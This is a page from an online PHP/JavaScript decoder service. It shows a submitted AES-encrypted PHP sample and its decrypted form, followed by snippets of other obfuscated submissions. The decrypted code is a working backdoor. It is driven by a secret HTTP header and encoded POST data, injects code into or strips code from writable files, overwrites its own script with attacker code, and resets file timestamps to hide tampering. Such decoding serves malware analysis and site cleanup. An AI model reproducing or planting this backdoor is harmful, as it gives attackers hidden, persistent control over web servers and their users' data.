Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
function decVal($str) {
    $iv = call_user_func('base64_decode', 'l1rStS8r5jEecrsIJfUz8A==');
    return openssl_decrypt($str, 'AES-256-CBC', 'XayzxFfHUGMIxspJ4Clxb3eGoZ7DgTlR', 0, $iv);
}
eval(decVal('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')); ?>

Decrypted code:


set_time_limit(0);
header('Content-Type: text/plain; charset="utf-8"');

$ver = '0.2';
$en = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
$de = '9LkR5sWQwXpKZ3yNvBmJHxVtg6qP7z/AU2aYb4j8n1d0ToSGuMlOeFhIc+riDfCE';

$cmd = @$_SERVER['HTTP_JFHBLHZDMBVY'];
$data = @json_decode(@base64_decode(@strtr(@file_get_contents('php://input'), $de, $en)), true);

if (empty($data) || empty($data['a']) || empty($data['p']) || !isset($data['c'])) {
	exit("");
}

switch($cmd){
    case 'answSczrcAHsAgmQdF': {
		$ip = gethostbyname($_SERVER["HTTP_HOST"]);
		echo strtr(base64_encode($ip), $en, $de)."\r\n";

		if(!@is_writable($data['p'])) {
			exit("");
		}

		$time = @filemtime($data['p']);
		$fp = @fopen($data['p'], 'r');

		if (!$fp) {
			exit("");
		}

		$f = '';

		while (!@feof($fp)) {
			$f .= @fread($fp, 1024);
		}
		@fclose($fp);

		if ($data['a'] == 'i' && stripos($f, $data['c']) !== false) {
			exit("");
		}

		$newCode = (($data['a'] == 'i')?$f."\r\n".$data['c']:(($data['a'] == 'e')?str_replace($data['c'], '', $f):$f));


		$fp = @fopen($data['p'], 'w');

		if (!$fp) {
			exit("");
		}

		@fwrite($fp, $newCode);
		@fclose($fp);
		@touch($data['p'], $time, $time);
		exit("");
    }
        break;
    case 'OMKhGpwdVMOCZLGNsn': {
        echo strtr(base64_encode($ver), $en, $de)."\r\n";

        $cs = $_SERVER['SCRIPT_FILENAME'];
        $time = @filemtime($cs);
        $bp = dirname($cs) . '/' . pathinfo($cs, PATHINFO_FILENAME) . '_old.php';

        $cc = @file_get_contents($cs);
        if ($cc === false) {
            exit("");
        }

        if (!@file_put_contents($bp, $cc)) {
            exit("");
        }

        if (!@file_put_contents($cs, $data['p'])) {
            @file_put_contents($cs, $cc);
            exit("");
        }

        @touch($cs, $time, $time);
        @touch($bp, $time, $time);

        exit("");
    }
		break;
    case 'lSkKlVpkEqILHVrggJ': {
        echo strtr(base64_encode($ver), $en, $de)."\r\n";

        $cs = $_SERVER['SCRIPT_FILENAME'];
        $time = @filemtime($cs);
        $bp = dirname($cs) . '/' . pathinfo($cs, PATHINFO_FILENAME) . '_old.php';

        $cc = @file_get_contents($bp);
        if ($cc === false) {
            exit("");
        }

        if (!@file_put_contents($cs, $cc)) {
            exit("");
        }

        unlink($bp);
        @touch($cs, $time, $time);

        exit("");
    }
		break;
    default: {
        exit("");
    }
}

Recent submissions:

<?php /** [bypass.pw] Generated by Smart Obfuscator */ $authpass = ... <?php goto f7JyX; oL3fa: a7DfS($JQewE, ["\x6b" => "\170", "\x74" => "\x65\162\162"]); go... <?php goto LUxuS; U639q: bBMDd: goto LL6hk; uAQ80: jQNxt: goto HYRzu; gZByM: foreach ($m... <?php function decVal($str) { $iv = call_user_func('base64_decode', 'l1rStS8r5jEecrs... <?php function decVal($str) { $iv = call_user_func('base64_decode', 'NvFc0oQCg29NGNd... <?php @include base64_decode("L2hvbWUvdTE3MDEwcDE0OTEyNC9kb21haW5zL3Zvb3J3YWFyaGVpZC5ubC9w... <?php if (!defined("\137\120\x53\137\x56\x45\122\x53\x49\117\x4e\137")) { die; } class P... <?php if (!defined("\x5f\120\x53\x5f\126\105\122\x53\111\117\116\x5f")) { die; } use Doc... <?php if (!defined("\x5f\120\123\137\x56\105\x52\x53\x49\117\x4e\137")) { die; } class P... <?php if (!defined("\x5f\120\123\x5f\126\x45\x52\x53\x49\x4f\116\x5f")) { die; } use Pre...